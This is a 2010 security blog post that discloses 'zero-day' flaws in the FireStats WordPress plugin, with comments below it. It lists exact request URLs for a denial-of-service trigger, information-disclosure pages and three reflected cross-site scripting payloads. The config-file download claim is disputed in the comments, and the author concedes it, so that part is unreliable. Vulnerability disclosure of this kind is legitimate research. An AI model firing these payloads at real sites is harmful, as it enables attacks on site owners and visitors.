Go beyond the impossible!
More 0day wordpress security leaks in firestats!
I just tried to find more security leaks in the firestats plugin, I was specifically searching for remotely exploitable problems.
The results are 7 fresh security issues.
1x DoS:
/wp-content/plugins/firestats/bridge.php?file_id=reset_password&show=1
1x remotely downloadable configuration file; this may contain the database information (username, password, name, prefix, host).
/wp-content/plugins/firestats/php/tools/get_config.php
2x Information disclosue:
/wp-content/plugins/firestats/php/page-sites.php /wp-content/plugins/firestats/php/page-tools.php
3x XSS:
/wp-content/plugins/firestats/php/window-add-excluded-ip.php?edit=%3Cscript%3Ealert%28123%29%3C/script%3E /wp-content/plugins/firestats/php/window-add-excluded-url.php?edit=%3Cscript%3Ealert%28123%29%3C/script%3E /wp-content/plugins/firestats/php/window-new-edit-site.php?site_id=%27%20onmousemove=alert%28123%29;%20style=width:900;height:900;%20a=
Let’s hope they patch soon because we are running Firestats too, the previous fix came very fast so I assume they will fix it this time fast too.
Oh and feel free to test the exploits against this site (but don’t try out the DoS please).
Good luck Firestats team with fixing these vulnerabilities!
Print article | This entry was posted by Jelmer de Hen on 09/07/2010 at 8:28 pm, and is filed under Critical, Web Security. Follow any responses to this post through RSS 2.0. You can leave a response or trackback from your own site. |
about 2 days ago
nice find ..hope they fix it soon
about 1 day ago
The most significant thing is of course the configuration file download, however it’s totally false.
see if you can get my config file from here:
http://admin.firestats.cc/firestats/php/tools/get_config.php
this php script is designed to generate a config file on demand, not to give the current one.
for instance, here is the config file of Bill Gates:
http://admin.firestats.cc/firestats/php/tools/get_config.php?user=Bill%20Gates&pass=secret!
about 1 day ago
You are right; I looked at the code but I could not find anything worthy.
Why would you have this function in Firestats, it’s pretty pointless I think.